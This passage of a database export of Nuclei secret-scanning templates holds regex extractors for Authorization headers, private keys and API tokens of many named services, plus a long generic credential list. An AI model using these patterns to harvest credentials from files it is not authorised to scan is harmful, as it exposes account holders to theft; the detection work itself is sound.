\"(?i)(Authorization:\\\\sbasic\\\\s+[a-z0-9=:_\\\\-+/]{5,100})\"\n\n - type: regex\n name: authorization-bearer\n regex:\n - \"(?i)(Authorization:\\\\sbearer\\\\s+[a-z0-9=:_\\\\-\\\\.+/]{5,100})\"\n\n - type: regex\n name: rsa-private-key\n regex:\n - \"(?i)(-----BEGIN RSA PRIVATE KEY-----)\"\n\n - type: regex\n name: ssh-dsa-private-key\n regex:\n - \"(?i)(-----BEGIN DSA PRIVATE KEY-----)\"\n\n - type: regex\n name: ssh-ec-private-key\n regex:\n - \"(?i)(-----BEGIN EC PRIVATE KEY-----)\"\n\n - type: regex\n name: potential-ajax-request\n regex:\n - \"(?i)(new\\\\s+xmlhttprequest\\\\(\\\\)|\\\\$\\\\.ajax\\\\(\\\\{)\"\n# digest: 4a0a00473045022100a1dfbb218bb6e589fe608e853b26ab2acd789a197a02d92e3f0499331b80e03602206ac9cf015a855085c501f0e372f587e6dd518133e9bb9781de0d34ee15266bb9:922c64590222798bb761d5b6d8e72950", "hash": "8b3d557ff6a907ca2ef3649dcb89d530", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cce" }, "name": "adafruit-key.yaml", "content": "id: adafruit-key\n\ninfo:\n name: Adafruit API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go\n metadata:\n verified: true\n tags: adafruit,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:adafruit)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9_-]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100e18e66c25918d1d8e980ab39a1d206e65dc34ef8b6ae0e043c87d34f0496d4260220651cd87fb75b897e27766f354e0711534ef67b6f368885d00fbf79ed44ed72a7:922c64590222798bb761d5b6d8e72950\n", "hash": "adc0a025b5a861513d4fefd0fa6939aa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccf" }, "name": "airtable-key.yaml", "content": "id: airtable-key\n\ninfo:\n name: Airtable API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go\n metadata:\n verified: true\n tags: keys,file,airtable,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:airtable)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{17})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a004630440220673067de4dbbe1d9d4f9337d2eddd6903ed401646b5e2ef23b4cb4fbc15e4bb40220774a7aafc56f3023bd7d681d429badb45d714352a8fcb74844e5913b116cfce2:922c64590222798bb761d5b6d8e72950", "hash": "1612a5d8954107296c8ea9bcbe785ca1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd0" }, "name": "algolia-key.yaml", "content": "id: algolia-key\n\ninfo:\n name: Algolia API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go\n metadata:\n verified: true\n tags: algolia,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:algolia)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950\n", "hash": "f26a54d26ff9d699638f0a0409db2af8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd1" }, "name": "beamer-api-token.yaml", "content": "id: beamer-api-token\n\ninfo:\n name: Beamer API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go\n metadata:\n verified: true\n tags: file,keys,beamer,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:beamer)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}(b_[a-z0-9=_\\-]{44})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100fcfc6abc15f7dbbac899737691fc7df9720aa9fa24c15b3ab39d26c012479b6f022014363cacef4a92e1d65e067c948733f94b555d8d657b9007bc52d804b3c444cc:922c64590222798bb761d5b6d8e72950", "hash": "3bacdbc2d70204a95f5c08d99f7cbf57", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd2" }, "name": "branch-key.yaml", "content": "id: branch-key\n\ninfo:\n name: Branch.io Live Key - Detect\n author: 0xh7ml\n severity: info\n description: Branch.io live key token was detected.\n reference:\n - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"key_live_.{32}\"\n\n# Enhanced by md on 2023/05/04\n# digest: 490a004630440220307fbc9759a842b11dab44b3a55e808d8e8a5b11cfad4fab56ae5bf6d7ff7ff602203a4a0c6e88a0cc25f9b4869f95a86611d5b5a789fe519bf11f8be6fa685ba02c:922c64590222798bb761d5b6d8e72950", "hash": "d897c90b6e314226ad53b7547add3e2e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd3" }, "name": "clojars-api-token.yaml", "content": "id: clojars-api-token\n\ninfo:\n name: Clojars API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go\n metadata:\n verified: true\n tags: file,keys,clojars,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(CLOJARS_)[a-z0-9]{60}\n# digest: 4a0a00473045022100e8e34978eeeb59acc43a8c856b5fc0749395c50c95f49496f094ac4cf789dfa0022023f583e761abc90a1bdc22094f12af0e622aa61686970bfa18d42db1cb3a79ff:922c64590222798bb761d5b6d8e72950", "hash": "d3d271743903c182014f8cba8df2562c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd4" }, "name": "cloudinary.yaml", "content": "id: cloudinary-basic-auth\n\ninfo:\n name: Cloudinary Basic Authorization - Detect\n author: gaurang\n severity: high\n description: Cloudinary basic authorization token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n tags: keys,file,token,cloudinary\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"cloudinary://[0-9]{15}:[0-9A-Za-z\\\\-_]+@[0-9A-Za-z\\\\-_]+\"\n\n# Enhanced by md on 2023/05/04\n# digest: 490a0046304402201744d25857ea77e5daf43a26dc6f905aeb2b0a623b26aa428c90aa67ff84b3c502205bc4dd714202f82f1cbd9ad2b1b5d7d9d97213f83918afc43b060b4970e5f493:922c64590222798bb761d5b6d8e72950", "hash": "25408269bed4a1fea6898c6093b9e4d4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd5" }, "name": "code-climate-token.yaml", "content": "id: code-climate-token\n\ninfo:\n name: Code Climate Token - Detect\n author: DhiyaneshDK\n severity: info\n description: Code Climate token was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml\n - https://github.com/codeclimate/ruby-test-reporter/issues/34\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: file,keys,codeclimate,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)codeclima.{0,50}\\b([a-f0-9]{64})\\b'\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a0047304502200e6bd9867a66b28556bb5e59fc7dd5582ac68f9dff902978f3672453fcff2936022100ba11083fa52bea39929d563d17d8875f3464ce09d21e96d15a3b6faaea2b8453:922c64590222798bb761d5b6d8e72950", "hash": "c04bf8454e50c72b0a0a11eb34f6ec06", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd6" }, "name": "codecov-access-token.yaml", "content": "id: codecov-access-token\n\ninfo:\n name: Codecov Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go\n metadata:\n verified: true\n tags: file,keys,codecov,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:codecov)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a004830460221008723ce3d0d49d00043601d70f614318dd71d3c20680925198c2a9894cc454460022100cd817ccf94a80cfa81cc2cb192791e916edb1a8612a6ee15e604bbf2dc33d1d6:922c64590222798bb761d5b6d8e72950", "hash": "de68cc8c59908346a63dd13d68007cf1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd7" }, "name": "coinbase-access-token.yaml", "content": "id: coinbase-access-token\n\ninfo:\n name: Coinbase Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go\n metadata:\n verified: true\n tags: file,keys,coinbase,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:coinbase)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9_-]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100b0e43a01846e52c6ab419c0c554ba0dd5ec2a1707ad7e7d487551fb5de15fe1e02205ffefab3d7d66389b1b96b8cb008b8673e94b4abdc43f32f3771722323bb5d32:922c64590222798bb761d5b6d8e72950", "hash": "88103e3213f9a3937e9832b76338fd29", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd8" }, "name": "contentful-api-token.yaml", "content": "id: contentful-api-token\n\ninfo:\n name: Contentful Delivery API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go\n metadata:\n verified: true\n tags: file,keys,contentful,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:contentful)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{43})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100a46c48e50f22fbb3d9976aa5180b3083c6d77903067dc0fee7c14580261a2da1022100fadbf251c47aea97f30f39aa444da8f271f7d5fb0833c77bc0a52ac6b39b7cbf:922c64590222798bb761d5b6d8e72950", "hash": "f42782bc0bea0411cbdef44f79ec92b1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd9" }, "name": "cratesio-api-key.yaml", "content": "id: cratesio-api-key\n\ninfo:\n name: Crates.io API Key - Detect\n author: DhiyaneshDK\n severity: info\n description: Crates.io API key was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml\n - https://crates.io/data-access\n - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: keys,file,crates,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\bcio[a-zA-Z0-9]{32}\\b'\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a00483046022100cdb57fbebbea0f610e2da0421aa23ce8ed6cdc12d5bb09d7b02f8b7f99f47eb5022100bf1a5d9c555af349ba146cd09185e141c95bd8e4ea0a6eb00049f2b22b21b300:922c64590222798bb761d5b6d8e72950", "hash": "6c22353feb3f6b46a68fc93760f66635", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cda" }, "name": "credential-exposure-file.yaml", "content": "id: credentials-disclosure-file\n\ninfo:\n name: Credentials Disclosure Check\n author: Sy3Omda,geeknik,forgedhallpass,ayadi\n severity: unknown\n description: Check for multiple keys/tokens/passwords hidden inside of files.\n tags: exposure,token,file,disclosure\n# Extract secrets regex like api keys, password, token, etc ... for different services.\n# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.\n# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.\n# Regex count:- 687\n# Notes:-\n# This template requires manual inspection once found valid match.\n# Generic token could be anything matching below regex.\n# Impact of leaked token depends on validation of leaked token.\n# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml\n# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating\n# Example cases to match against: https://regex101.com/r/HPtaU2/1\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(?i)[\\\"']?zopim[_-]?account[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?zhuliang[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?zensonatypepassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\\\s|=)\"\n - \"(?i)[\\\"']?yt[_-]?server[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?partner[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?partner[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?account[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?account[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yangshun[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yangshun[_-]?gh[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?www[_-]?googleapis[_-]?com[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?ssh[_-]?connect[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?report[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?prepare[_-]?dir[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?db[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?db[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wporg[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wordpress[_-]?db[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wordpress[_-]?db[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wincert[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?test[_-]?server[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?fb[_-]?password[_-]?3[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?fb[_-]?password[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?fb[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?5[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?4[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?3[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?watson[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?watson[_-]?device[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?watson[_-]?conversation[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wakatime[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vscetoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?visual[_-]?recognition[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?virustotal[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vip[_-]?github[_-]?deploy[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?v[_-]?sfdc[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?v[_-]?sfdc[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?usertravis[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?use[_-]?ssh[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?urban[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?urban[_-]?master[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?urban[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?unity[_-]?serial[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?unity[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitteroauthaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitteroauthaccesssecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitter[_-]?consumer[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitter[_-]?consumer[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twine[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?configuration[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?api[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?trex[_-]?okta[_-]?client[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?trex[_-]?client[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 